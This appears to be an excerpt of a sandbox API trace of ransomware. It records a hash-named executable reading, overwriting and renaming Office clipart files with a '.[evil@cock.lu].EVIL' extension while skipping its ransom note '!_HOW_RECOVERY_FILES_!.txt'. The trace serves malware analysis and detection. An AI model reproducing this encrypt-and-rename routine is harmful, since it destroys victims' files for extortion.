WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1140, lpOverlapped=0x0) returned 1 [0160.331] CloseHandle (hObject=0x1a8) returned 1 [0160.331] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.332] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.332] __uncaught_exception () returned 0x84b1160800 [0160.332] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.332] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01852_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01852_.wmf.[evil@cock.lu].evil")) returned 1 [0160.333] ??_V@YAXPEAX@Z () returned 0x1 [0160.337] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01852_.WMF", dwFileAttributes=0x200) returned 0 [0160.337] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.337] wcsstr (_Str="NA01858_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.337] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF") returned 69 [0160.337] wcscmp (_String1="NA01858_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.337] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01858_.WMF") returned 0x0 [0160.338] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF") returned 0x45 [0160.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01858_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.340] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x10c8, lpOverlapped=0x0) returned 1 [0160.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.349] _errno () returned 0x84b1160840 [0160.349] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.349] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x10e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10e0, lpOverlapped=0x0) returned 1 [0160.350] CloseHandle (hObject=0x1a8) returned 1 [0160.350] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.350] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.350] __uncaught_exception () returned 0x84b1160800 [0160.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.351] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01858_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01858_.wmf.[evil@cock.lu].evil")) returned 1 [0160.352] ??_V@YAXPEAX@Z () returned 0x1 [0160.355] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01858_.WMF", dwFileAttributes=0x200) returned 0 [0160.355] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.355] wcsstr (_Str="NA01866_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.355] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF") returned 69 [0160.355] wcscmp (_String1="NA01866_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.356] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01866_.WMF") returned 0x0 [0160.356] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF") returned 0x45 [0160.356] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01866_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.358] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xdb8, lpOverlapped=0x0) returned 1 [0160.368] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.368] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.368] _errno () returned 0x84b1160840 [0160.368] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.368] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xdc0, lpOverlapped=0x0) returned 1 [0160.368] CloseHandle (hObject=0x1a8) returned 1 [0160.368] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.368] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.368] __uncaught_exception () returned 0x84b1160800 [0160.368] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.369] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01866_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01866_.wmf.[evil@cock.lu].evil")) returned 1 [0160.370] ??_V@YAXPEAX@Z () returned 0x1 [0160.373] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01866_.WMF", dwFileAttributes=0x200) returned 0 [0160.374] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.374] wcsstr (_Str="NA02009_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.374] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF") returned 69 [0160.374] wcscmp (_String1="NA02009_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.374] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02009_.WMF") returned 0x0 [0160.374] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF") returned 0x45 [0160.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02009_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.376] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x27e0, lpOverlapped=0x0) returned 1 [0160.386] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.386] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.386] _errno () returned 0x84b1160840 [0160.386] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.386] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2800, lpOverlapped=0x0) returned 1 [0160.386] CloseHandle (hObject=0x1a8) returned 1 [0160.387] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.387] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.387] __uncaught_exception () returned 0x84b1160800 [0160.387] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.387] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02009_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02009_.wmf.[evil@cock.lu].evil")) returned 1 [0160.388] ??_V@YAXPEAX@Z () returned 0x1 [0160.392] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02009_.WMF", dwFileAttributes=0x200) returned 0 [0160.392] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.392] wcsstr (_Str="NA02041_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.392] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF") returned 69 [0160.392] wcscmp (_String1="NA02041_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.392] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02041_.WMF") returned 0x0 [0160.392] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF") returned 0x45 [0160.392] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02041_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.395] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x918, lpOverlapped=0x0) returned 1 [0160.921] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.921] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.921] _errno () returned 0x84b1160840 [0160.921] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.922] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x920, lpOverlapped=0x0) returned 1 [0160.922] CloseHandle (hObject=0x1a8) returned 1 [0160.922] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.922] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.922] __uncaught_exception () returned 0x84b1160800 [0160.922] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.922] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02041_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02041_.wmf.[evil@cock.lu].evil")) returned 1 [0160.924] ??_V@YAXPEAX@Z () returned 0x1 [0160.928] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02041_.WMF", dwFileAttributes=0x200) returned 0 [0160.928] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.928] wcsstr (_Str="NA02066_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.928] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF") returned 69 [0160.928] wcscmp (_String1="NA02066_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.928] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02066_.WMF") returned 0x0 [0160.928] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF") returned 0x45 [0160.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02066_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.933] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x43c, lpOverlapped=0x0) returned 1 [0160.946] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.946] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.946] _errno () returned 0x84b1160840 [0160.946] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.947] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x440, lpOverlapped=0x0) returned 1 [0160.947] CloseHandle (hObject=0x1a8) returned 1 [0160.947] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.947] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.947] __uncaught_exception () returned 0x84b1160800 [0160.947] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.948] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02066_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02066_.wmf.[evil@cock.lu].evil")) returned 1 [0160.949] ??_V@YAXPEAX@Z () returned 0x1 [0160.952] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02066_.WMF", dwFileAttributes=0x200) returned 0 [0160.952] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.952] wcsstr (_Str="NA02091_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.952] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF") returned 69 [0160.952] wcscmp (_String1="NA02091_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.952] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02091_.WMF") returned 0x0 [0160.952] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF") returned 0x45 [0160.952] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02091_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.955] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x474, lpOverlapped=0x0) returned 1 [0160.958] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.958] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.958] _errno () returned 0x84b1160840 [0160.958] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.958] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x480, lpOverlapped=0x0) returned 1 [0160.958] CloseHandle (hObject=0x1a8) returned 1 [0160.958] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.958] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.958] __uncaught_exception () returned 0x84b1160800 [0160.958] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.959] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02091_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02091_.wmf.[evil@cock.lu].evil")) returned 1 [0160.960] ??_V@YAXPEAX@Z () returned 0x1 [0160.963] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02091_.WMF", dwFileAttributes=0x200) returned 0 [0160.964] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.964] wcsstr (_Str="NA02092_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.964] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF") returned 69 [0160.964] wcscmp (_String1="NA02092_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.964] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02092_.WMF") returned 0x0 [0160.964] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF") returned 0x45 [0160.964] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02092_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.966] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x66c, lpOverlapped=0x0) returned 1 [0160.969] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.969] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.969] _errno () returned 0x84b1160840 [0160.969] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.969] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x680, lpOverlapped=0x0) returned 1 [0160.969] CloseHandle (hObject=0x1a8) returned 1 [0160.970] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0160.970] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0160.970] __uncaught_exception () returned 0x84b1160800 [0160.970] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0160.970] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02092_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02092_.wmf.[evil@cock.lu].evil")) returned 1 [0160.971] ??_V@YAXPEAX@Z () returned 0x1 [0160.975] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02092_.WMF", dwFileAttributes=0x200) returned 0 [0160.975] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0160.975] wcsstr (_Str="NA02093_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0160.975] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF") returned 69 [0160.975] wcscmp (_String1="NA02093_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0160.975] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA02093_.WMF") returned 0x0 [0160.975] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF") returned 0x45 [0160.975] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02093_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.978] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a0, lpOverlapped=0x0) returned 1 [0160.980] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.980] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0160.980] _errno () returned 0x84b1160840 [0160.980] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.980] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2c0, lpOverlapped=0x0) returned 1 [0160.980] CloseHandle (hObject=0x1a8) returned 1 [0160.981] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02093_.WMF", _Mode="a", _ShFlag=64) returned 